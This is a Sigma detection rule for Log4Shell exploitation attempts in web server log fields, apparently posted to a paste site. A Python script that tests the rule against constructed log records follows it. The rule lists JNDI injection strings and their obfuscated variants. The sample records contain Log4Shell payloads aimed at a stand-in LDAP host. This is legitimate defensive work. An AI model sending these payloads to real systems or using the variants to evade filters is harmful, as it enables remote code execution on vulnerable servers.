talon_s2w

[TALON] log4shell sigmarule - kudos to Florian Roth

Dec 13th, 2021
title: Log4j RCE CVE-2021-44228 in Fields
id: 9be472ed-893c-4ec0-94da-312d2765f654
status: experimental
description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
author: Florian Roth
date: 2021/12/10
modified: 2021/12/12
references:
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://news.ycombinator.com/item?id=29504755
    - https://github.com/tangxiaofeng7/apache-log4j-poc
    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
    - https://github.com/YfryTchsGD/Log4jAttackSurface
    - https://twitter.com/shutingrz/status/1469255861394866177?s=21
tags:
    - attack.initial_access
    - attack.t1190
logsource:
    category: webserver
detection:
    # Each field is its own list entry so the four checks are ORed. In Sigma,
    # keys inside a single map are ANDed, which would require every field to
    # carry a payload at the same time and defeat the "different fields" intent.
    selection:
        - cs-User-Agent|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
        - user-agent|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
        - cs-uri|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
        - cs-referrer|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
    condition: selection
falsepositives:
    - Vulnerability scanning
level: high
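Added here as an illustration and not part of the pasted rule: a small Python check that applies the rule's pattern list to constructed web server log records with Sigma semantics (case-insensitive `contains`, the four fields ORed). It goes one step beyond the rule by also testing the once-URL-decoded value of each field; the field names follow the rule, while the hostnames and records are constructed.

```python
from urllib.parse import unquote

# Patterns copied verbatim from the rule above (same list for every field).
PATTERNS = [
    '${jndi:ldap:/', '${jndi:rmi:/', '${jndi:ldaps:/', '${jndi:dns:/',
    '/$%7bjndi:', '%24%7bjndi:', '$%7Bjndi:', '%2524%257Bjndi',
    '%2F%252524%25257Bjndi%3A', '${jndi:${lower:', '${::-j}${',
    '${jndi:nis', '${jndi:nds', '${jndi:corba', '${jndi:iiop',
    '${${env:BARFOO:-j}', '${::-l}${::-d}${::-a}${::-p}', '${base64:JHtqbmRp',
]
# Field names as the rule spells them; mapping them onto a concrete log
# schema (e.g. IIS cs(User-Agent)) is the Sigma backend's job, not ours.
FIELDS = ('cs-User-Agent', 'user-agent', 'cs-uri', 'cs-referrer')
# Sigma string matching is case-insensitive, so compare lowercased text.
LOWER_PATTERNS = [p.lower() for p in PATTERNS]

def matched_fields(record):
    """Return the rule fields whose value contains any pattern.

    Fields listed as separate selection entries are ORed in Sigma, so a hit
    in any single field is enough for the rule to fire.
    """
    hits = []
    for field in FIELDS:
        raw = str(record.get(field, '')).lower()
        # Assumption beyond the rule: also test the once-URL-decoded value,
        # so a fully percent-encoded query string is still recognised.
        candidates = (raw, unquote(raw))
        if any(p in c for c in candidates for p in LOWER_PATTERNS):
            hits.append(field)
    return hits

def is_alert(record):
    """True when the rule's condition (selection) holds for this record."""
    return bool(matched_fields(record))

# Constructed sample records, already parsed into the rule's field names.
SAMPLE_RECORDS = [
    {'cs-uri': '/index.html', 'cs-User-Agent': 'Mozilla/5.0', 'cs-referrer': '-'},
    {'cs-uri': '/login', 'cs-User-Agent': '${jndi:ldap://scanner.example/a}'},
    {'cs-uri': '/?q=%24%7Bjndi%3Aldap%3A%2F%2Fscanner.example%2Fa%7D',
     'cs-User-Agent': 'curl/7.79.1'},
    {'cs-uri': '/', 'cs-referrer': '${JNDI:LDAP://scanner.example/a}'},
]

if __name__ == '__main__':
    for rec in SAMPLE_RECORDS:
        print('ALERT' if is_alert(rec) else 'clean', matched_fields(rec), rec)
```

The third record only fires because of the decode step; the rule's own encoded variants assume the colon after `jndi` stays literal, so a backend that does not normalise URLs relies on the raw patterns alone.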